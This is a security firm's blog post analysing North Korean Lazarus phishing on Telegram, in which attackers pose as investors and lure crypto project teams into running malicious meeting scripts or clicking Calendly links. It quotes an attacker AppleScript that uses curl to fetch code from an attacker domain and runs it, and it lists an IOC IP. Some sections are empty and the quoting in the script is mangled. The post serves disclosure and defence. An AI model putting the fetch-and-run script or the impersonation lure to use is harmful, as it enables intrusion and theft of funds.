Analysis of North Korean Hackers’ Targeted Phishing Scams on Telegram

SlowMist
5 min readDec 6, 2023

--

Background

Since 2022, our team at SlowMist, using the SlowMist BTI intelligence network, discovered that the North Korean hacker group Lazarus initiated a widespread phishing operation on Telegram, specifically targeting the cryptocurrency industry. More recently, these hackers have escalated their tactics by posing as reputable investment institutions to execute phishing scams against various cryptocurrency project teams. Due to the considerable impact of these fraudulent activities, we at SlowMist have undertaken a detailed analysis.

Tactics and Strategies:

1. The North Korean hackers carefully choose well-established investment institutions to impersonate. Following this selection, they proceed to create fake Telegram accounts under these entities’ names.

2. With these fake accounts, they then target prominent DeFi (Decentralized Finance) project teams. Posing as potential investors from well-established investment institutions, they begin to implement their scam strategies.

After establishing communication, the hackers try to convince the team to download a script, falsely claiming it’s necessary for setting up a meeting. However, project teams with a strong sense of security awareness recognize the dangers of downloading random scripts, as illustrated below. In contrast, less security-savvy teams might be tricked by these scams, as they are crafted to look very convincing and authentic.

After gaining the trust of the project team, the North Korean hackers begin to schedule meetings, employing two types of attack methods:

1. Inviting the project team to join meetings at domains like ***.group-meeting.team, they pretend to inquire about the team’s availability for a meeting or detailed discussion and provide a malicious meeting link. When the project team clicks the link, they encounter a region access restriction. At this point, the North Korean hackers coax the team into downloading and running a “location-modifying” malicious script. Once the project team complies, their computer comes under the control of the hackers, leading to the theft of funds. Below is the content of the malicious script IP_Request.scpt:

set fix_url to “https://support.group-meeting.online/778188/request-for-troubleshooting"

set sc to do shell script “curl -L -k””& fix_url &”\””

run script sc

```

Code Explanation:

2. Utilizing the “Add Custom Link” feature of the Calendly meeting scheduling system on event pages, the hackers insert malicious links to initiate phishing attacks. Since Calendly integrates well with the daily work routines of most project teams, these malicious links do not easily raise suspicion. Consequently, the project teams may inadvertently click on these malicious links, download, and execute malicious code. At this point, the North Korean hackers can also gain access to information or permissions related to the project team’s systems.

We actually issued a warning about these attack methods on November 30, 2023:

Basic Indicators of Compromise (IOC):

IP: 104.168.137.21

Domains:

Malicious Attack Examples

Conclusion

Given the continuous occurrence of these phishing scams, the SlowMist security team advises Web3 users to thoroughly verify the identity of new contacts using multiple methods before accepting them. It is also recommended to enable two-factor authentication (2FA) on Telegram to enhance account security. Users should remain alert regarding transaction security to avoid financial losses. In the event of a malware infection, it’s essential to immediately disconnect from the internet and conduct a virus scan. Affected users should promptly change the passwords of all relevant accounts on the compromised computer, including those saved in web browsers. Additionally, if there are any digital wallets on the infected computer, it’s critical to transfer the funds to a safe location without delay.

Further reading:
https://securelist.com/bluenoroff-new-macos-malware/111290/

About SlowMist

At SlowMist, we pride ourselves on being a frontrunner in blockchain security, dedicating years to mastering threat intelligence. Our expertise is grounded in providing comprehensive security audits and advanced anti-money laundering tracking to a diverse clientele. We’ve established a robust network for threat intelligence collaboration, positioning ourselves as a key player in the global blockchain security landscape. We offer tailor-made security solutions that span from identifying threats to implementing effective defense mechanisms. This holistic approach has garnered the trust of numerous leading and recognized projects worldwide, including names like Huobi, OKX, Binance, imToken, Crypto.com, Amber Group, Klaytn, EOS, 1inch, PancakeSwap, TUSD, Alpaca Finance, MultiChain, and Cheers UP. Our mission is to ensure the blockchain ecosystem is not only innovative but also secure and reliable.

SlowMist offers a variety of services that include but are not limited to security audits, threat information, defense deployment, security consultants, and other security-related services. They offer AML (Anti-money laundering) software, Vulpush (Vulnerability monitoring) , SlowMist Hacked (Crypto hack archives), FireWall.x (Smart contract firewall) , Safe Staking and other SaaS products. They have partnerships with domestic and international firms such as Akamai, BitDefender, FireEye, RC², TianJi Partners, IPIP, etc.

By delivering a comprehensive security solution customized to individual projects, they can identify risks and prevent them from occurring. Their team was able to find and publish several high-risk blockchain security flaws. By doing so, they could spread awareness and raise the security standards in the blockchain ecosystem.

💬Website 🐦Twitter ⌨️GitHub

--

--

SlowMist

SlowMist is a Blockchain security firm established in 2018, providing services such as security audits, security consultants, red teaming, and more.